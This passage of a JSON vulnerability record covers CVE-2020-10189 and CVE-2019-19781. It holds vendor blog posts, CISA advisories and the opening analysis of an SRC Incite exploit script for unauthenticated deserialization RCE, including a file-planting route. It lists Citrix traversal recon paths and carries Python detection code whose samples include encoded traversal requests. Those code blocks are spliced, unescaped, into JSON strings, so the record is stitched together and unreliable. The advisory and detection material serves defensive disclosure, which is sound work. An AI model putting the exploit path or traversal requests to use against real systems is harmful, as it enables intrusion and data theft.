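    finally:
        guard.uninstall()


if __name__ == "__main__":
    print(demo())   # ['ran:pong', 'blocked', 'blocked', 'blocked']
```

The decision lives in `is_allowed`, separate from the hook, so the policy can be tested and tuned without spawning anything; in production the allowlist would be derived from what the application is observed to need, which is the "positive security" idea rather than a blocklist of attacker command lines.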
Tightly coupled with the application and requiring no external connectivity, RASP protections are consistently applied regardless of where the application is deployed today or in the future. Using a positive security approach (permitting only the behavior the application is known to need, rather than blocking known-bad patterns), RASP mitigates risk from supply chain attacks by neutralizing malicious software activity including unauthorized network calls, file system access, and execution of commands on the underlying host operating system.\n\nThis may be why the National Institute of Standards and Technology includes runtime application self-protection as control enhancement SI-7(17) in Special Publication 800-53 Revision 5, [Security and Privacy Controls for Information Systems and Organizations](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf>).\n\nSee [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) for yourself.\n\nThe post [5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-22T12:28:49", "type": "impervablog", "title": "5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-04-22T12:28:49", "id": "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "href": "https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-19T15:26:21", "description": "On December 17, Citrix issued a [Security Bulletin](<https://support.citrix.com/article/CTX267027>) on an unauthenticated remote code execution vulnerability (CVE-2019-19781) affecting its Citrix Application Delivery Controller (ADC) - formerly known as NetScaler ADC - and its Citrix Gateway - formerly known as NetScaler Gateway.\n\nAt the time of the security bulletin release, there was no official information available on what the exact vulnerability was, although Citrix did [release Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) which shed some light on how the vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. 
We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. 
What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of the various clients, identified by client verification tests, that were the sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - identified by its cURL User-Agent, as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the number of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked:\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. 
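The request-path logic this post describes, as an added Python example; it is neither Imperva's WAF signatures nor Citrix's responder policy. It models the interim mitigation (a 403 for URLs that contain both `/vpns/` and `/../`), canonicalizes the path so percent-encoded and double-encoded traversals resolve to the same target as the literal `/vpn/../vpns/` form, flags requests that resolve to the `smb.conf` and `newbm.pl` paths listed above, and counts how many blocked requests came from the cURL and Python clients the post identifies. The `authenticated` flag (legitimate SSL VPN sessions also use `/vpns/`), the sample requests and their User-Agent strings are constructed for the example.

```python
"""Added example (not Imperva's or Citrix's code): classify HTTP request paths for
CVE-2019-19781 recon/exploit traffic.

Three rules, in order:
  1. decoded URL contains both "/vpns/" and "/../"  -> block (interim-mitigation style)
  2. canonical path is smb.conf or newbm.pl          -> block (recon/exploit targets from the post)
  3. canonical path under /vpns/ without a session   -> block (unauthenticated recon)
Canonicalization matters: a literal substring match sees "%2e%2e" as harmless.
"""
import posixpath
from typing import Dict, List, Tuple
from urllib.parse import unquote

SENSITIVE_TARGETS = {"/vpns/cfg/smb.conf", "/vpns/portal/scripts/newbm.pl"}
# Clients the post attributes the Bash and Python exploit scripts to.
SCRIPTED_UA_PREFIXES = ("curl/", "python-requests/", "Python-urllib/")


def decode_fully(raw_path: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so %2e%2e and %252e%252e both become '..'."""
    path = raw_path.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def canonical_path(raw_path: str) -> str:
    """Resolve dot-segments the way the backend will: /vpn/../vpns/x -> /vpns/x."""
    return posixpath.normpath("/" + decode_fully(raw_path).lstrip("/"))


def classify_request(raw_path: str, user_agent: str = "", authenticated: bool = False) -> Tuple[str, str]:
    """Return ("block"|"allow", reason). `authenticated` is an assumed session flag."""
    decoded = decode_fully(raw_path)
    canon = canonical_path(raw_path)
    if "/vpns/" in decoded and "/../" in decoded:
        return "block", "dot-segment traversal into /vpns/"
    if canon in SENSITIVE_TARGETS:
        return "block", "request resolves to " + canon
    if (canon == "/vpns" or canon.startswith("/vpns/")) and not authenticated:
        return "block", "unauthenticated access under /vpns/"
    return "allow", ""


def summarize(requests: List[Tuple[str, str, bool]]) -> Dict[str, int]:
    """Count verdicts, and how many blocks came from the scripted clients the post names."""
    counts = {"blocked": 0, "allowed": 0, "blocked_from_scripted_clients": 0}
    for path, user_agent, authenticated in requests:
        verdict, _ = classify_request(path, user_agent, authenticated)
        if verdict == "block":
            counts["blocked"] += 1
            if user_agent.startswith(SCRIPTED_UA_PREFIXES):
                counts["blocked_from_scripted_clients"] += 1
        else:
            counts["allowed"] += 1
    return counts


# Constructed sample traffic: (path, User-Agent, has_vpn_session).
SAMPLE_REQUESTS = [
    ("/vpn/../vpns/cfg/smb.conf", "curl/7.64.0", False),                      # Bash/cURL script
    ("/vpn/%2e%2e/vpns/portal/scripts/newbm.pl", "python-requests/2.22.0", False),
    ("/vpn/%252e%252e/vpns/cfg/smb.conf", "Python-urllib/3.7", False),        # double-encoded
    ("/vpns/", "Mozilla/5.0", False),                                         # unauthenticated recon
    ("/vpns/portal/homepage.html", "Mozilla/5.0", True),                      # legitimate VPN session
    ("/vpn/index.html", "Mozilla/5.0", False),                                # ordinary logon page
]

if __name__ == "__main__":
    for path, ua, authed in SAMPLE_REQUESTS:
        print(f"{classify_request(path, ua, authed)[0]:5}  {path}  ({ua})")
    print(summarize(SAMPLE_REQUESTS))
```

Rule 3 is why the authenticated-session exception exists: blocking every request under `/vpns/` would break the gateway's own portal, so the unauthenticated case is what the rule targets, while rules 1 and 2 fire regardless of session state because no legitimate client should traverse into `/vpns/` or read `smb.conf`.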
The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-19T15:00:50", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:49", "description": "Zoho has released a security update on a vulnerability 
(CVE-2020-10189) affecting ManageEngine Desktop Central build 10.0.473 and below. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to control servers, laptops, smartphones, and tablets from a central location.\n\nThe Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the [Zoho security update](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for more information and apply the [patch](<https://www.manageengine.com/products/desktop-central/service-packs.html>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update on ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:51", "description": "Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. 
Citrix plans to begin releasing security updates for affected software starting January 20, 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:\n\n * Review the Citrix article on [updates on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/>), published January 17, 2020;\n * See Citrix Security Bulletin [CTX267027 \u2013 Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027>);\n * Apply the recommended mitigations in [CTX267679 \u2013 Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>); and\n * Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T00:00:00", "type": "cisa", "title": "Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory", "bulletinFamily": "info", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T00:00:00", "id": "CISA:134C272F26FB005321448C648224EB02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:54", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released a [utility](<https://github.com/cisagov/check-cve-2019-19781>) that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. 
According to Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>), beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.\n\nCISA strongly advises affected organizations to review CERT/CC\u2019s Vulnerability Note [VU#619785](<https://www.kb.cert.org/vuls/id/619785/>) and Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>) and apply the mitigations until Citrix releases new versions of the software.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "cisa", "title": "CISA Releases Test for Citrix ADC and Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": 
false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "CISA:661993843C9F9A838ADA8B8B8B9412D1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:50", "description": "Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>) and apply the necessary updates. CISA also recommends users and administrators:\n\n * Run the [Indicators of Compromise Scanner](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>);\n * Review the Citrix article on [CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>), published January 23, 2020; and\n * Review CISA\u2019s Activity Alert on [Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://www.us-cert.gov/ncas/alerts/aa20-020a>).\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T00:00:00", "type": "cisa", "title": "Citrix Releases Security Updates for SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-23T00:00:00", "id": "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "srcincite": [{"lastseen": "2022-04-20T17:15:52", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the FileStorage class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. 
An attacker can leverage this vulnerability to execute code under the context of SYSTEM.\n\n**Affected Vendors:**\n\nManageEngine\n\n**Affected Products:**\n\nDesktop Central\n\n**Vendor Response:**\n\nManageEngine has issued an update to correct this vulnerability. More details can be found at: \n<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2020-0011 : ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "SRC-2020-0011", "href": "https://srcincite.io/advisories/src-2020-0011/", "sourceData": "#!/usr/bin/env python3\n\"\"\"\nManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability\n\nDownload: https://www.manageengine.com/products/desktop-central/download-free.html\nFile ...: 
ManageEngine_DesktopCentral_64bit.exe\nSHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826\nFound by: mr_me\nDate ...: 2019-12-12\nCVE ....: CVE-2020-10189\nClass ..: CWE-502\nCVSS ...: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)\nPatch ..: https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n\n## Summary:\n\nAn unauthenticated attacker can reach a Deserialization of Untrusted Data vulnerability that can allow them to execute arbitrary code as SYSTEM/root.\n\n## Vulnerability Analysis:\n\nIn the web.xml file, we can see one of the default available servlets is the `CewolfServlet` servlet.\n\n```CewolfServletde.laures.cewolf.CewolfRendererdebugfalseoverliburl/js/overlib.jsstoragede.laures.cewolf.storage.FileStorage1...CewolfServlet/cewolf/*```\n\nThis servlet, contains the following code:\n\n```\n protected void doGet(HttpServletRequest request, HttpServletResponse response)\n throws ServletException, IOException {\n if (debugged) {\n logRequest(request);\n }\n addHeaders(response);\n if ((request.getParameter(\"state\") != null) || (!request.getParameterNames().hasMoreElements())) {\n requestState(response);\n return;\n }\n int width = 400;\n int height = 400;\n boolean removeAfterRendering = false;\n if (request.getParameter(\"removeAfterRendering\") != null) {\n removeAfterRendering = true;\n }\n if (request.getParameter(\"width\") != null) {\n width = Integer.parseInt(request.getParameter(\"width\"));\n }\n if (request.getParameter(\"height\") != null) {\n height = Integer.parseInt(request.getParameter(\"height\"));\n }\n if (!renderingEnabled) {\n renderNotEnabled(response, 400, 50);\n return;\n }\n if ((width > config.getMaxImageWidth()) || (height > config.getMaxImageHeight())) {\n renderImageTooLarge(response, 400, 50);\n return;\n }\n String imgKey = request.getParameter(\"img\"); // 1\n if (imgKey == null) {\n logAndRenderException(new ServletException(\"no 'img' parameter provided for Cewolf servlet.\"), 
response,\n width, height);\n return;\n }\n Storage storage = config.getStorage();\n ChartImage chartImage = storage.getChartImage(imgKey, request); // 2\n```\n\nAt [1] the code sets the `imgKey` variable from the GET parameter `img`. Later, at [2], it calls `storage.getChartImage` with that attacker-supplied value. You may be wondering what class the `storage` instance is. It is mapped as an init parameter of the servlet in the web.xml file:\n\n```\n<init-param>\n <param-name>storage</param-name>\n <param-value>de.laures.cewolf.storage.FileStorage</param-value>\n</init-param>\n```\n\n```\npublic class FileStorage implements Storage {\n static final long serialVersionUID = -6342203760851077577L;\n String basePath = null;\n List stored = new ArrayList();\n private boolean deleteOnExit = false;\n\n //...\n\n public void init(ServletContext servletContext) throws CewolfException {\n basePath = servletContext.getRealPath(\"/\");\n Configuration config = Configuration.getInstance(servletContext);\n deleteOnExit = \"true\".equalsIgnoreCase(\"\" + (String) config.getParameters().get(\"FileStorage.deleteOnExit\"));\n servletContext.log(\"FileStorage initialized, deleteOnExit=\" + deleteOnExit);\n }\n\n //...\n\n private String getFileName(String id) {\n return basePath + \"_chart\" + id; // 4\n }\n\n //...\n\n public ChartImage getChartImage(String id, HttpServletRequest request) {\n ChartImage res = null;\n ObjectInputStream ois = null;\n try {\n ois = new ObjectInputStream(new FileInputStream(getFileName(id))); // 3\n res = (ChartImage) ois.readObject(); // 5\n ois.close();\n } catch (Exception ex) {\n ex.printStackTrace();\n } finally {\n if (ois != null) {\n try {\n ois.close();\n } catch (IOException ioex) {\n ioex.printStackTrace();\n }\n }\n }\n return res;\n }\n```\n\nAt [3] the code calls `getFileName` with the attacker-controlled `id` (the `img` GET parameter), which returns a path on the filesystem built from `basePath`. That field is set in `FileStorage.init` from `servletContext.getRealPath(\"/\")`, i.e. the root directory of the deployed web application. 
On the same line, the code creates a new `ObjectInputStream` instance from the supplied filepath via `FileInputStream`. This path is attacker controlled at [4], however, there is no need to (ab)use traversals here for exploitation.\n\nThe most important point is that at [5] the code calls `readObject` using the contents of the file without any further lookahead validation.\n\n## Exploitation:\n\nFor exploitation, an attacker can (ab)use the `MDMLogUploaderServlet` servlet to plant a file on the filesystem with controlled content inside. Here is the corresponding web.xml entry:\n\n```MDMLogUploaderServletcom.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet...MDMLogUploaderServlet/mdm/mdmLogUploader/mdm/client/v1/mdmLogUploader```\n\n```\npublic class MDMLogUploaderServlet extends DeviceAuthenticatedRequestServlet {\n private Logger logger = Logger.getLogger(\"MDMLogger\");\n private Long customerID;\n private String deviceName;\n private String domainName;\n private Long resourceID;\n private Integer platformType;\n private Long acceptedLogSize = Long.valueOf(314572800L);\n\n public void doPost(HttpServletRequest request, HttpServletResponse response, DeviceRequest deviceRequest)\n throws ServletException, IOException {\n Reader reader = null;\n PrintWriter printWriter = null;\n\n logger.log(Level.WARNING, \"Received Log from agent\");\n\n Long nDataLength = Long.valueOf(request.getContentLength());\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : file conentent lenght is {0}\", nDataLength);\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet :Acceptable file conentent lenght is {0}\", acceptedLogSize);\n try {\n if (nDataLength.longValue() <= acceptedLogSize.longValue()) {\n String udid = request.getParameter(\"udid\"); // 1\n String platform = request.getParameter(\"platform\");\n String fileName = request.getParameter(\"filename\"); // 2\n HashMap deviceMap = MDMUtil.getInstance().getDeviceDetailsFromUDID(udid);\n if (deviceMap != null) {\n 
